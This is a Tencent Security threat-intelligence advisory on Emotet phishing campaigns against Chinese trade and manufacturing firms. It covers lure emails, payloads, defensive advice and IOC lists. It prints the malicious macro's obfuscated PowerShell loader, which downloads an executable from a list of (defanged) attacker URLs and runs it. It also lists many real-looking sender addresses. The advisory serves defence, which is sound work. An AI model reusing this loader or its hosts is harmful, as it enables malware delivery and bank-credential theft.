腾讯安全预警:Emotet银行木马针对国内企业的攻击增加

2019-09-27 15:29:50
近期,腾讯安全御见威胁情报中心监测到Emotet银行木马针对国内的攻击呈明显上升趋势,从事进出口贸易的企业是Emotet银行木马的主要目标。

一、背景

Emotet具有用于进行银行欺诈的模块,主要针对德国,奥地利和瑞士的银行进行攻击,多年来,该恶意软件被全球安全厂商归类为银行木马。近期,腾讯安全御见威胁情报中心监测到Emotet银行木马针对国内的攻击呈明显上升趋势,从事进出口贸易的企业是Emotet银行木马的主要目标。

此次攻击具有以下特点:

1.钓鱼邮件利用恶意宏代码下载攻击载荷;

2.钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言;

3.攻击者伪造大量虚假邮箱作为发件人(超过100个,详见IOCs)

4.攻击载荷Emotet会继续下载其他银行木马作为Payload

5.银行木马能够检测用户银行登录行为,通过读取隐私数据获取账号密码登录信息,甚至通过注入恶意代码到交互页面,从而在用户进行网银相关操作时盗取帐户资产。

部分受攻击企业如下:

根据腾讯安全御见威胁情报中心统计数据,Emotet针对国内的钓鱼邮件攻击最严重地区为广东省、北京市、上海市、江苏省等地。该病毒影响的地区分布如下:


从病毒攻击影响的行业来看,受害最严重的是传统制造业、教育咨询(特别是国际教育)、商务贸易。具体受影响行业分布如下:


二、详细分析

攻击者构造大量虚假发件人(完整列表见IOCs)

gmarin@coopetico.co.cr

shyder@npvstaffing.com

sandramansilla@ciacbolivia.com

shop@jubinordic.ch

c.roosen@admvalue.fr

sales@premelectricals.net

shahidsattar@ekadacorporation.com

almacen@nourbistro.com

gsantana@ciproteo.com.mx

Bryany.Backshall@barnardandbrough.co.uk

harendra.k@idctechnologies.com

ivaca@nunezserrano-asociados.com

almacen@coenplas.com

taiyathurai@pariscountryclub.com

engineeringpune2@polyplasticsindia.com

subhasri.parida@sysnetglobal.com

betty-adam@orange.fr

fpatel@pharmanovamw.com

snehal.kakkad@bmw-infinitycars.in

ram.gopal@gfl.co.in

。。。

钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言。

德语:


西班牙语:


英语:


邮件主题通常涉及交易,付款和发票。包括:“ ACH付款信息付款通知发票交易逾期付款已付款发票销售发票状态更新所需文件新订单收据


有意思的是,我们在溯源过程中还发现了某精密仪器制造公司georgfischer收到的来自邮件服务商ix.netcom.com的威胁告警邮件,邮件提醒该公司警惕正在发生的攻击。

邮件标题及译文如下:

Attention! - Please be careful with email attachments. A Virus - Trojan attack is currently under way (TA542:)

译文:

注意!-请小心电子邮件附件。病毒-特洛伊木马正在进行攻击(TA542:


根据对应的官网介绍,被警告的公司georgfischer创建于1802 年,总部位于瑞士,在 33 个国家经营着140家公司,其中57家是生产基地,业务覆盖液体气体安全输送、轻质铸造件以及高精度制造技术等领域,是一家跨国集团公司。


Georgfischer的相关人员在收到邮件服务商的提醒邮件后,又将邮件文件打包发给了德国电信公司旗下网络安全公司t-systems.com,并请求该公司将攻击邮件的发件人使用的邮箱锁定,以期达到防御目标。

邮件内容及译文如下:

Dear helpdesk,

Dear Janos

Kindly check whether fraud attack and block this sender

Best Helmut

译文:

Dear helpdesk,

Dear Janos

请检查是否有欺诈攻击并阻止此发件人

Best Helmut


被求助的t-systems是德国电信(DeutscheTelekom)子公司,该公司提供网络基础设施服务。


我们捕获到攻击者使用的钓鱼邮件附件文档名如下:

SCAN_5PYSF6A1BR.doc

DOC_NPKICRA3C6LQW9Y_ACD.doc

Dok_393027_2112976231.rtf

Santander 682634154514193.doc

INF_XOUZRYAJ7TZ9G6J_18092019.doc

Alb.525.doc

DOK_62597273590_A.doc

055843559 factura septiembre.doc

INF_931516975144_B.doc

附件文档中均附带恶意的宏代码:


宏代码利用Powershell下载银行木马emotet,下载时使用的URL地址以“@”分割记录,其中的5个地址会被依次请求进行下载。

$DIiMMwdP='pw79UV5N';$r89Bqv9M = '523';$z1oZiDj='Ol_qmEC';$Lj6JlLHz=$env:userprofile+'\'+$r89Bqv9M+'.exe';

$qt4En6DB='R3vqiSFT';$CiILkHUo=.('ne'+'w-ob'+'ject') neT.wEbCLIENt;$qWG_jzZV='

http[:]//shael.org/hosting/TYXchcKkHz/

@http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/

@https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/

@http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/

@http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/'."Sp`LiT"('@');$lt5rEpMz='NTMPsFi';

foreach($AkOZPzW in $qWG_jzZV){try{$CiILkHUo."dO`w`Nl`oAdfile"($AkOZPzW, $Lj6JlLHz);$lWdD4O='vbXhwM6';If ((&('Get-'+'I'+'tem') $Lj6JlLHz)."L`eNgTH" -ge 24814) {[Diagnostics.Process]::"STa`Rt"($Lj6JlLHz);$K_0tQwob='a9dvKGGb';break;$BcRHRV4='FSAmRV6'}}catch{}}$ErZcNH='wnWqFd_a'

下载emotet网络流量如下:


早期版本的Emotet具有银行欺诈模块,主要针对银行进行攻击。更高版本的Emotet不再加载其自己的银行木马模块,而是加载第三方银行木马恶意软件。

Emotet收集系统信息,加密后发送至服务器,然后继续下载第三方载荷,包括QbotThe TrickIcedIDGootkit等木马。


这些银行木马最终通过检测用户网银登录行为,通过读取隐私数据获取账号密码信息,甚至通过注入恶意代码到交互页面,从而在用户的银行相关操作过程时盗取账户资产及机密信息。

三、安全建议

1、我们建议企业邮箱网管根据本文末尾提供的IOCs信息,将危险发件人邮箱设置为黑名单;

2、建议企业通过培训,教育员工不要打开不明来源的邮件附件,对于附件中的文件要谨慎打开,如果附件是可执行程序,一定不要随意运行;

3、升级office系列软件到最新版本,及时修复office组件漏洞,除非确认文档来源可靠,否则不要启用宏;

4、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;

5、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统;


IOCs

发件邮箱

gmarin@coopetico.co.cr

shyder@npvstaffing.com

sandramansilla@ciacbolivia.com

shop@jubinordic.ch

c.roosen@admvalue.fr

sales@premelectricals.net

shahidsattar@ekadacorporation.com

almacen@nourbistro.com

gsantana@ciproteo.com.mx

Bryany.Backshall@barnardandbrough.co.uk

harendra.k@idctechnologies.com

ivaca@nunezserrano-asociados.com

almacen@coenplas.com

taiyathurai@pariscountryclub.com

engineeringpune2@polyplasticsindia.com

subhasri.parida@sysnetglobal.com

betty-adam@orange.fr

fpatel@pharmanovamw.com

snehal.kakkad@bmw-infinitycars.in

ram.gopal@gfl.co.in

pam.hulls@emilbraun.com.au

finance@sabena.co.id

info@workwearworld.net

rezervasyon@livsuit.com

antoinette@robsmail.co.za

facturanexus@extremetechcr.com

nilda.munoz@markas.com.bo

compras@gfr.com.mx

buchhaltung@gaertnerei-saarlouis.de

posventa@andrescarrasco.net

jaleman@texcaz.com

omar.diaz@mtpsanluis.com

tom_guoyu@163.com

print@copyedge.com

reservation@ritajtravel.com

ppspune@polyplasticsindia.com

sushma@componentbuy.com

nahla@elamanaco.com

recruitment@muditaapp.com

rjohns@smithcastings.com

blog@simon-bureau.com

hkeller@meosag.ch

bjoy@fibrexholding.com

cuentasporpagar@liorcosmetics.com

cihan@pursan.net

international_22@wisewaymail.com

aguerrero@geo4wd.com

david@eigbox.net

reservation@sailomhotelhuahin.com

international_61@wisewaymail.com

md.mustak@yourhostingaccount.com

nsirsat@xdbscorp.net

gcorrales@geo4wd.com

workorder@dentalfixrx.com

ahmadali@kohatcement.com

iletisim@zinbelgelendirme.com

salmancucs@suzukipakpattan.com

ascdelcerro@poligonosancristobal.com

kultura@poczta.kartuzy.pl

rana@e-enggltd.com

biju@petronengineering.com

valuacion.elrosedal@saicc.com.mx

hkeller@regio-werb.ch

info@cda-teq.ca

kiki@shinesra.com

ljunkin@southerncare.org

info@hawksprairiedental.com

tayyab@watt-techs.com

tracy.watson@leadsventures.com

jianfei727@163.com

camed@microtelgsi.com

rudhra@resilienceit.com

b.miller@duquesnemo.org

yasser.habib@hbfcl.com

cotech.bilaspur@renault-india.com

mnathan@fibrexholding.com

darshana.jogale@bncinfotech.in

dzfp2018@51fapiao.cn

asociacion@poligonosancristobal.com

Hamid.mobariz@tbcc.com.af

oilgas@speakerresearch.org

michael@firstmedicalexperts.com

anil@sqexperts.com

dana@a1sheetmetaltulsa.com

joswalt@surgerycentermountdora.com

pdelarosa@grupoeif.com

info@efeaksesuar.com

clyton@ledcarrental.co.zw

eastgate.admin@mikeskitchen.co.za

administracion@transportestta.com.mx

cairo1@vapegypt.com

wmoore@summervista.com

khaled.osman@almarasemsales.com

w.chavez@grupoaceves.com

jason@bjnubway.com

servicio@sortercash.com

haigen.deng@faw-vw.com

xh_wangpeng@163.com

schiodo@sierravalleyhomecorp.com

admin-khi@sanalogistics.com

dbaskerville@aactionmovers.com

fares.dayoub@nncompany.co

rcolon@delcerro.com.do

administracion@lacasadelasaberturas.com.ar

tcspeedy@speedy.com.ec

info@willmarfarmcenter.com

fabrice.scmd@orange.fr

tocallaghan@cnicholls.co.uk

tesoreria@coinpa.com.py

parts.shahjahanpur@renault-india.com

contactus@melrosebeach-apts.com

facturaelectronica@extremetechcr.com

facturasc@extremetechcr.com

donna@texasgastransport.com

mathias@swedimport.se

DOC(钓鱼邮件附件文件)

69163d86ceec013b59fc929cee88e07a

7b14e01fe4fe705a3add1a9d1c3aba42

00f502fb9fdc87e892b6f13260c5dde5

dd29f94772fec370c9fe01efb6d9ae47

6e5334da4bf6e579eb227ddba9c96e48

2c5ef063217fb3989bbe464265b5c894

f273d0014aaf58ed56a557b0531f339a

29df0bb5c6d77bd88eba85409f4f9172

82f0ee5d0f009f989e0ab3f9fe37aa86

d04617c9f25d729e7db52cc009e175d0

d206d5bd7fd0f9218ddab766de9d326a

e013e8ac575eeab6195caf07085098bc

2f2b014b7348a9aa3b1ccddf5b20be56

ba8533dcc3053527a08afafdab094373

ba222b5181a1429511c061176503cad7

64be822e76a6c19e2e11e22cb755e1b8

9de79dfc8de476a5f3908f934b33a937

fe8c07e33eadafab80e9a8e1351eee0d

Emotet

4f34a0fcc16ae643624d1f5a7d048a99

d27f692276898374f578ab6d207ab063

Domain

shael.org

lottizzazionesavarra.it

nfbio.com

herrenmode.tk

endofhisrope.net

IP

190.106.97.230

186.75.241.230

URL

http[:]//shael.org/hosting/TYXchcKkHz/

http[:]//shael.org/cgi-sys/suspendedpage.cgi

http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/

http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/

https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/

http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/

http[:]//190.106.97.230/report/health/add/merge/

http[:]//186.75.241.230/img/jit/xian/

http[:]//186.75.241.230/glitch/enabled/

参考链接:

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service

腾讯安全以腾讯安全大脑为核心,构建了一套自适应的闭环安全防护体系,包含基础安全防护体系,安全运营中心、业务安全服务体系等,其产品矩阵涉及终端安全、网络安全、云安全、业务安全、数据安全、安全管理、安全服务等多个方向。

更多信息,请访问:https://s.tencent.com

最新资讯